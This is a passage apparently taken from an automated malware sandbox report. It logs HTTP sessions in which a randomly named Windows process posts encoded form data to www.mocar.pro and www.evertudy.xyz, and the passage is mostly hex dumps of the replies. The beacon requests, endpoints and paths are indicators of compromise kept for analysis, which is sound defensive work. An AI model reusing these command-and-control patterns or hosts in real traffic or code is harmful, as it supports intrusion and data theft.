                Jul 3, 2024 08:55:02.443182945 CEST1236INData Raw: 8a 61 d4 ae 6c ff 78 2d d5 8c 2a 51 e8 8c 8b bf 1a 38 c3 f3 0d 60 24 f7 37 95 08 ab 9b 1a c1 c5 ad c0 46 aa a2 70 2a 19 37 f3 46 c2 b9 5d cc b9 dc 14 5b 21 2e 17 50 b4 b5 ed da 9d b2 82 28 c5 1e 19 62 03 b3 17 c1 32 4e 3a 9d 5f 5d 86 8c 83 41 46
                Data Ascii: alx-*Q8`$7Fp*7F][!.P(b2N:_]AF;d}1{&)ZSwz1PBcd2M^JYtWR4`e;}:Em^RaG>A6l['9c(?O/{Q\?)a9Syp
                Jul 3, 2024 08:55:02.443196058 CEST1236INData Raw: 38 ba 60 66 1a 27 40 a5 7c d4 ed 5b e3 f6 b8 61 56 50 a7 34 e7 ad c3 ca 52 71 03 16 6b 2e 5f 2a e5 1c 8e a9 34 ee 14 89 07 cb 74 9c 64 b6 55 de ee 59 ae 55 fa a4 0a a2 12 7e bc 63 2c d3 76 32 f0 7c 53 f8 04 d4 42 17 f7 d0 a0 ef d7 f6 d3 64 f9 06
                Data Ascii: 8`f'@|[aVP4Rqk._*4tdUYU~c,v2|SBdRX7FJU<S%"wtAoH=?R80M/ye!S`&R,u|%.0@{/Uv3cV^GuN(0=M[@0b
                Jul 3, 2024 08:55:02.443970919 CEST1236INData Raw: 68 cc c4 7d dc 58 5d 28 a3 1b 56 40 4c 12 60 41 7f c4 c6 0d 8a d9 99 40 9b c9 e4 d4 69 92 36 da 47 34 b8 61 94 4b 77 e2 b9 86 c5 c7 0e e5 90 27 63 05 6d c1 4c 43 6b 64 8c e0 6c bb 17 ab 1f 87 82 06 c0 85 f6 18 a8 a1 cb eb 41 23 37 fc 64 41 9f 80
                Data Ascii: h}X](V@L`A@i6G4aKw'cmLCkdlA#7dA/0i9odVtRwv7r]7GGg;8PhA``R@"G&ox}< xX=S^rGJN'([AIK`ec:7S1x:p1?*U
                Jul 3, 2024 08:55:02.443984032 CEST748INData Raw: 54 6a 98 a2 86 98 83 58 fb 3b 09 15 55 2f da 1a 6a d4 d9 95 6e de 34 fc c0 b4 03 b2 c1 1e 93 d0 6d ef c6 ea 2d 5b 42 75 cb 9d 12 2c 08 00 46 3c b8 79 0c 05 4c e0 dc e5 2c 7e 1c 15 ba 0b 76 45 1b cd fc c4 42 71 85 0c 15 00 ec d4 2b 27 06 72 5f b5
                Data Ascii: TjX;U/jn4m-[Bu,F<yL,~vEBq+'r_awN^@+CYp{-u+\-fG:=h]MQyKis&n7im;'<hZSA$sN95X_.TPCl)^ZvcS&
                Jul 3, 2024 08:55:02.443994999 CEST1236INData Raw: 31 32 61 66 0d 0a 3a 75 0e 44 14 f4 21 a0 08 19 e6 7e a9 45 d6 9b a6 f2 5c f5 92 bf ba af 6a f2 68 90 84 6d 62 04 3a 81 ec f5 ed c4 17 f7 d6 fb 9c 05 13 d9 52 6a 29 b6 2c f9 a6 f5 8a 2a a5 61 a1 74 7c 94 3a 93 3a 2f ad ee b2 7d ec 6d f2 db 72 f6
                Data Ascii: 12af:uD!~E\jhmb:Rj),*at|::/}mr}:>CN1fx$Elwh6ZFv#K;Z+iz8 OJ +e?]C'=k(k`IMArpT!!
                Jul 3, 2024 08:55:02.448005915 CEST1236INData Raw: 50 f8 13 0a 3f 13 ca 41 8b 15 04 09 bd f5 c8 98 ed e6 40 18 02 47 a7 81 61 76 72 87 5f 66 a2 dd 85 a7 f2 49 c3 51 8a 93 02 1e 27 d9 e1 d0 4b 96 79 56 05 10 98 c5 aa b1 d0 cb 74 20 d6 3a 9e d8 2b 3b 60 ad 45 0a 9b d9 d0 0b 26 47 9f 6a f3 03 a5 e2
                Data Ascii: P?A@Gavr_fIQ'KyVt :+;`E&Gjq?a`*liHSqT5"qBel9hhy$YQ8,^~B4"z+k@Hv(;bICW"tES`'E50[2)%|+"j


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                19192.168.2.949733109.95.158.122801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:03.635739088 CEST1756OUTPOST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 32 35 64 49 56 75 4f 5a 64 32 49 55 2b 65 71 33 30 37 54 62 33 65 6a 66 46 49 7a 4b 50 45 41 77 46 54 58 2b 61 65 2f 37 68 61 53 62 54 53 4a 6e 78 49 48 6f 63 4a 6f 69 6d 66 44 5a 74 71 41 66 71 54 2f 37 64 38 39 4e 69 31 68 61 76 6e 6b 71 61 31 49 4b 70 79 4c 71 54 58 30 79 56 36 7a 67 46 33 45 75 42 31 39 32 77 76 55 6e 76 69 47 63 54 4a 44 55 42 70 31 31 58 46 34 75 52 6a 4a 41 65 54 72 64 30 30 38 47 55 75 54 4b 62 64 67 35 45 34 72 42 78 61 34 69 58 63 70 4f 65 35 6f 4b 63 73 30 73 69 6a 67 52 46 58 61 72 78 6f 53 68 4b 62 57 42 64 6d 54 77 72 75 64 74 57 4b 43 6b 4f 69 62 75 77 44 79 4b 59 4a 64 72 74 30 5a 52 48 6c 35 49 57 36 6d 33 56 48 6d 73 50 6a 4c 76 4e 4c 73 70 4e 57 4a 37 79 61 30 4b 62 41 49 59 6b 6c 68 54 41 4f 42 6d 4b 38 72 53 61 66 63 73 4e 62 4d 55 2b 55 79 68 38 4f 58 7a 48 37 59 67 65 68 4a 62 36 6f 6f 48 4f 62 34 71 39 79 74 68 51 44 62 5a 65 56 [TRUNCATED]
                Data Ascii: hH=DW+FCkdcSeqSGjTd5PeoaNLMBm8PmY7ExA0DZpJNj25dIVuOZd2IU+eq307Tb3ejfFIzKPEAwFTX+ae/7haSbTSJnxIHocJoimfDZtqAfqT/7d89Ni1havnkqa1IKpyLqTX0yV6zgF3EuB192wvUnviGcTJDUBp11XF4uRjJAeTrd008GUuTKbdg5E4rBxa4iXcpOe5oKcs0sijgRFXarxoShKbWBdmTwrudtWKCkOibuwDyKYJdrt0ZRHl5IW6m3VHmsPjLvNLspNWJ7ya0KbAIYklhTAOBmK8rSafcsNbMU+Uyh8OXzH7YgehJb6ooHOb4q9ythQDbZeVpWIGB2EffPd6RryMmzUun68ngyB5TRENjvvKtA9FWOoA4G78uNYcyYdILhQLUNjXlsymSLxwd2qXNikcu/3hf/5LDFZFwo0FT41eXu3WdD8QiV+Z7cyt5Rz4HP8TeqWVvtrW8tKTLJiF64+Gyyqaufi6Aelg4fgzabW3xxf0EFOWuVwo06sDO2hECvYqJfWVck2Kel3npWabRNDoh5Mi9SS7U6v5efgdU5/SAQYXNob1wuk53pZi61pGg+56XyaVYUN36r9cOHvEtHKxJZkFZQD3KrlbBSR/cZ7QEsEaget2ToJvv9spUo5M0xhVY2Z1S5CoiXEhif742ZIsTxEi5kAI9KUeHXctXTim3k9rOKzr/0YOQpJvnK7r4HpmvyUMYSjA0wMQiNlA8VibrJPL//EWq9Q4S8khpN48uI7IQGGxJntuz603+voumJ06FLHZPlXn9iBiTrD7kM/XJIrlJqdgs0xC6C5ZUOY8PoeC1SnNZHH7iIAoUi+R3Rqd1Wf6X291x2YTv0hGTP7l4Uc86xX5pSJDDWiOZWompLhD93RXFI+MqJT6caK4Rq0mI5610opto7j0VaBKBXXJFhUCrtmTInpvSgIDdXWDfpPCYyaXyz7C/SekF/hYcaSreiAmTX+lBUFYP95ArDtP1WtAzyE2vLtfqd2urC [TRUNCATED]
                Jul 3, 2024 08:55:05.044754982 CEST1236INHTTP/1.1 404 Not Found
                Connection: close
                x-litespeed-tag: 39e_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"
                x-et-api-version: v1
                x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/
                x-et-api-origin: https://mocar.pro
                x-tec-api-version: v1
                x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/
                x-tec-api-origin: https://mocar.pro
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 06:55:04 GMT
                server: LiteSpeed
                Data Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b [TRUNCATED]
                Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
                Jul 3, 2024 08:55:05.044891119 CEST1236INData Raw: f4 a1 2d 3f b2 33 4d 99 55 3e 40 99 11 f8 06 cb 6c 7e 26 73 79 52 66 17 8b fd c5 a2 cc a8 a0 b0 47 5a d0 61 36 2e 02 41 e3 b6 a5 d9 2b 6e db d3 e0 b8 6d 1f 5f cf 8b db 7d f9 4d a8 80 16 03 ad bc ab 34 a2 72 1e ec 20 95 31 b6 cc 76 7d 9a b7 0c 2a
                Data Ascii: -?3MU>@l~&syRfGZa6.A+nm_}M4r 1v}*8<4AvxwA3yFq9~6cH}@~d2#:/b~&gcb=}61>#tqi9~8j{Tr
                Jul 3, 2024 08:55:05.044903040 CEST448INData Raw: ff e3 1e 32 30 5f a4 88 07 0b 71 0d 80 33 62 6a 35 c3 60 56 90 c2 16 1c c6 b4 0f 3e ed 8c 33 a9 dd 14 9b ae ac af 6e 52 c4 a1 69 15 a3 4d ca 8c 03 d5 46 ea d2 a7 56 6e 34 9b 11 c2 09 4b 7a db e9 83 cf 62 a8 b2 00 26 c7 0a 8e 59 15 63 26 04 b3 2a
                Data Ascii: 20_q3bj5`V>3nRiMFVn4Kzb&Yc&*TX-Aikmh&'IjKdrdV4vA=&GG]DeFnVyjd+L75 9e~IsIX"-\H$2>w}mUa9o_8
                Jul 3, 2024 08:55:05.045370102 CEST1236INData Raw: 0f c9 63 46 63 a9 ef e5 57 66 46 0b 41 b1 67 48 71 94 5c 00 69 37 34 19 58 74 de fa 6a 06 af 6f 77 80 6b 00 18 78 56 e7 0c 9a 29 0a 30 2c f2 41 1d db 95 5f 52 9f e1 be 38 d4 0d 1d 0c 76 35 69 86 29 e2 ad 63 3b 1c 86 a3 aa 50 a6 bd ce 26 53 c7 76
                Data Ascii: cFcWfFAgHq\i74XtjowkxV)0,A_R8v5i)c;P&Sv`;G/tvj$i3]z\ar=yMFe64g"0h54(u\RZ1Bo`HZq7=k:; QryWdO$50b{Uiq>p)\
                Jul 3, 2024 08:55:05.045382023 CEST1236INData Raw: 56 11 e3 91 06 ac 1d 49 49 c9 58 56 f0 ad f3 22 65 42 f0 47 96 35 12 b2 8c 90 65 d2 c8 b8 e0 91 48 67 d8 2c a9 a5 6c 0f 39 43 22 85 82 2c 2d 96 26 09 8f 79 cd d2 e4 41 c9 95 b6 54 f8 cb f3 34 54 2a 47 11 36 06 7f 2c 20 40 9a e1 8d 0c 96 06 df 38
                Data Ascii: VIIXV"eBG5eHg,l9C",-&yAT4T*G6, @88{zM' B(iGIJH_@,0dBdJfpfVT8>+NcwEuQ>~_-#{0\=\jgyD=ss|QgNW
                Jul 3, 2024 08:55:05.046114922 CEST1236INData Raw: 8a 61 d4 ae 6c ff 78 2d d5 8c 2a 51 e8 8c 8b bf 1a 38 c3 f3 0d 60 24 f7 37 95 08 ab 9b 1a c1 c5 ad c0 46 aa a2 70 2a 19 37 f3 46 c2 b9 5d cc b9 dc 14 5b 21 2e 17 50 b4 b5 ed da 9d b2 82 28 c5 1e 19 62 03 b3 17 c1 32 4e 3a 9d 5f 5d 86 8c 83 41 46
                Data Ascii: alx-*Q8`$7Fp*7F][!.P(b2N:_]AF;d}1{&)ZSwz1PBcd2M^JYtWR4`e;}:Em^RaG>A6l['9c(?O/{Q\?)a9Syp
                Jul 3, 2024 08:55:05.046128035 CEST1236INData Raw: 38 ba 60 66 1a 27 40 a5 7c d4 ed 5b e3 f6 b8 61 56 50 a7 34 e7 ad c3 ca 52 71 03 16 6b 2e 5f 2a e5 1c 8e a9 34 ee 14 89 07 cb 74 9c 64 b6 55 de ee 59 ae 55 fa a4 0a a2 12 7e bc 63 2c d3 76 32 f0 7c 53 f8 04 d4 42 17 f7 d0 a0 ef d7 f6 d3 64 f9 06
                Data Ascii: 8`f'@|[aVP4Rqk._*4tdUYU~c,v2|SBdRX7FJU<S%"wtAoH=?R80M/ye!S`&R,u|%.0@{/Uv3cV^GuN(0=M[@0b
                Jul 3, 2024 08:55:05.046879053 CEST328INData Raw: 68 cc c4 7d dc 58 5d 28 a3 1b 56 40 4c 12 60 41 7f c4 c6 0d 8a d9 99 40 9b c9 e4 d4 69 92 36 da 47 34 b8 61 94 4b 77 e2 b9 86 c5 c7 0e e5 90 27 63 05 6d c1 4c 43 6b 64 8c e0 6c bb 17 ab 1f 87 82 06 c0 85 f6 18 a8 a1 cb eb 41 23 37 fc 64 41 9f 80
                Data Ascii: h}X](V@L`A@i6G4aKw'cmLCkdlA#7dA/0i9odVtRwv7r]7GGg;8PhA``R@"G&ox}< xX=S^rGJN'([AIK`ec:7S1x:p1?*U
                Jul 3, 2024 08:55:05.046891928 CEST1236INData Raw: 04 52 34 93 01 b9 03 2e 38 08 ad 53 48 5c 36 77 da 6b 8d 76 c7 b4 eb 8f 15 b3 4f d9 89 47 58 56 e7 d0 b0 39 4a f7 2d ad 19 19 2e 5f fc d0 f6 17 8a 16 6f 8e ed df 9d 56 8f e5 2d 36 52 d9 49 16 34 2f 72 c4 04 82 2d 38 6b 98 a0 5f 97 d7 9d ba 81 9a
                Data Ascii: R4.8SH\6wkvOGXV9J-._oV-6RI4/r-8k_Q8|pCBl_"6h*{}@6ux@:` 59SO96yfk@efP'DiYsvdCMw1dwVI+tIa
                Jul 3, 2024 08:55:05.046902895 CEST420INData Raw: 1a cc e2 b8 7c 34 30 90 e7 0d 17 59 91 fb 18 e9 a0 37 4b 47 e4 f6 e2 c9 f0 51 8b 78 7c 47 bd 13 7a 50 97 68 e4 fd a0 8e 3f 37 2a 68 c9 b9 00 46 1f e5 dd b6 77 04 ff 82 4b 41 8d 44 7a b5 ca bf a7 87 1f d4 fe 3a f0 05 b8 fe 37 f2 34 d4 fe d4 f5 ba
                Data Ascii: |40Y7KGQx|GzPh?7*hFwKADz:743QtQ4{izPFV:kLI5f~90`xnCDCW3r%JIgk@z[v)A$.>RSz(w\avF,y>!Z(R-@\(
                Jul 3, 2024 08:55:05.049922943 CEST1236INData Raw: 31 32 61 66 0d 0a 3a 75 0e 44 14 f4 21 a0 08 19 e6 7e a9 45 d6 9b a6 f2 5c f5 92 bf ba af 6a f2 68 90 84 6d 62 04 3a 81 ec f5 ed c4 17 f7 d6 fb 9c 05 13 d9 52 6a 29 b6 2c f9 a6 f5 8a 2a a5 61 a1 74 7c 94 3a 93 3a 2f ad ee b2 7d ec 6d f2 db 72 f6
                Data Ascii: 12af:uD!~E\jhmb:Rj),*at|::/}mr}:>CN1fx$Elwh6ZFv#K;Z+iz8 OJ +e?]C'=k(k`IMArpT!!


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                20192.168.2.949734109.95.158.122801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:06.168627024 CEST467OUTGET /prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:07.859935045 CEST485INHTTP/1.1 301 Moved Permanently
                Connection: close
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                x-redirect-by: WordPress
                location: http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4
                x-litespeed-cache: miss
                content-length: 0
                date: Wed, 03 Jul 2024 06:55:07 GMT
                server: LiteSpeed


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                21192.168.2.949735203.161.49.220801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:12.911125898 CEST728OUTPOST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6d 30 6b 61 63 72 37 6b 4d 54 77 75 4a 64 59 75 4c 57 70 31 64 4b 59 44 4c 4f 5a 70 53 55 38 2f 79 4c 77 4c 4e 68 4c 51 6d 58 62 61 4f 6c 51 41 6f 69 32 34 75 61 34 66 31 54 4f 67 68 58 69 6f 4a 39 2f 32 5a 58 72 69 45 46 69 68 50 74 4f 52 42 76 70 45 41 75 55 4d 71 6e 55 74 6d 31 59 48 45 30 52 75 2f 30 41 4b 33 52 6b 72 6c 48 6f 4c 55 53 30 2f 51 45 4f 61 55 70 35 77 4c 36 57 6f 4f 6b 54 72 36 45 4a 6b 58 4f 74 30 5a 7a 6e 31 58 52 43 46 35 31 4e 75 59 77 75 76 37 4c 50 56 41 76 32 42 30 33 53 55 57 61 4f 71 2b 4b 64 65
                Data Ascii: hH=FswQWeNiBqtZm0kacr7kMTwuJdYuLWp1dKYDLOZpSU8/yLwLNhLQmXbaOlQAoi24ua4f1TOghXioJ9/2ZXriEFihPtORBvpEAuUMqnUtm1YHE0Ru/0AK3RkrlHoLUS0/QEOaUp5wL6WoOkTr6EJkXOt0Zzn1XRCF51NuYwuv7LPVAv2B03SUWaOq+Kde
                Jul 3, 2024 08:55:13.515974045 CEST533INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:13 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                22192.168.2.949736203.161.49.220801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:15.453695059 CEST752OUTPOST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6e 55 55 61 54 73 6e 6b 4f 7a 77 74 47 39 59 75 51 47 70 35 64 4b 6b 44 4c 4d 31 35 53 68 55 2f 78 76 30 4c 4d 6a 76 51 6c 58 62 61 57 31 51 2f 6d 43 32 4a 75 61 31 67 31 52 71 67 68 58 32 6f 4a 34 54 32 5a 6b 54 68 47 56 69 6e 41 4e 4f 54 63 66 70 45 41 75 55 4d 71 6d 77 4c 6d 78 30 48 45 42 5a 75 2b 56 41 4e 35 78 6b 73 67 48 6f 4c 66 79 30 37 51 45 50 4a 55 6f 31 4b 4c 38 61 6f 4f 6c 6a 72 36 56 4a 6c 64 4f 74 32 55 54 6d 6b 55 52 6e 55 32 6c 56 51 63 32 75 74 6e 37 4c 4a 44 4f 57 66 6c 46 62 50 44 4e 4f 4e 35 74 55 32 70 55 44 75 53 38 64 6b 2b 42 67 45 6b 62 53 58 5a 79 6b 63 2f 51 3d 3d
                Data Ascii: hH=FswQWeNiBqtZnUUaTsnkOzwtG9YuQGp5dKkDLM15ShU/xv0LMjvQlXbaW1Q/mC2Jua1g1RqghX2oJ4T2ZkThGVinANOTcfpEAuUMqmwLmx0HEBZu+VAN5xksgHoLfy07QEPJUo1KL8aoOljr6VJldOt2UTmkURnU2lVQc2utn7LJDOWflFbPDNON5tU2pUDuS8dk+BgEkbSXZykc/Q==
                Jul 3, 2024 08:55:16.074518919 CEST533INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:15 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                23192.168.2.949737203.161.49.220801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:17.981709957 CEST1765OUTPOST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
